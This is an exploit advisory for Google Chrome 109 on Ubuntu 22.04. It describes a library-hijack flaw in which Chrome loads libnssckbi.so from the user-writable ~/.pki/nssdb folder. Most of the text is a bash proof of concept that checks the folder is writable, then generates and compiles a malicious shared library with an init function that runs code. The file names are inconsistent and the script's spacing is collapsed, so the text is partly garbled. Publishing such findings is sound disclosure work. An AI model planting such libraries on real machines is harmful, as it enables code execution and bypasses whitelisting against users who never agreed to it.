#Exploit Title: Google Chrome109.0.5414.74 - Code Execution via missing lib file (Ubuntu)
Product: Google Chrome
Discovered by: Rafay Baloch and Muhammad Samak
#Version: 109.0.5414.74#Impact: Moderate#Company: Cyber Citadel#Website: https://www.cybercitadel.com#Tested-on : Ubuntu 22.04.1
*Description*
Google chrome attempts to load the 'libssckbi.so'file from a user-writable location.
PATH: /home/$username/.pki/nssdb/libnssckbi.so
Since the Shared Library 'ibnssckbi.so' specified path is writeable.
It is possible to achieve the Code Execution by placing the malicious file with
the name `libnssckbi.so`in the specified path.
*exploit*
Following is the POC that could be used to reproduce the issue:
echo"\n\t\t\tGoogle-Chrome Shared Library Code Execution..."echo"[*] Checking /.pki/nssdb PATH"if[-d"/home/haalim/.pki/nssdb"]thenecho"[+] Directory Exists..."if[-w"/home/haalim/.pki/nssdb"]thenecho"[+] Directory is writable..."echo"[+] Directory is writable..."echo"[+] Generating malicious File libnssckbi.so ..."echo"#define _GNU_SOURCE"> /home/haalim/.pki/nssdb/exploit.c
echo"#include <unistd.h>">> /home/haalim/.pki/nssdb/exploit.c
echo"#include <stdio.h>">> /home/haalim/.pki/nssdb/exploit.c
echo"#include <stdlib.h>">> /home/haalim/.pki/nssdb/exploit.c
echo"void f() {">> /home/haalim/.pki/nssdb/exploit.c
echo'printf("Code Executed............ TMGM :)\n");'>> /home/haalim/.pki/nssdb/exploit.c
echo"}">> /home/haalim/.pki/nssdb/exploit.c
gcc -c-Wall-Werror-fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o
gcc -shared-o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o
fifi
Upon closing the browser windows, the application executes the malicious code
*Impact*
The attacker can use this behavior to bypass the application whitelisting rules.
This behavior can also lead to DoS attacks.
An attacker can trick a victim into supplying credentials by creating a fake prompt.
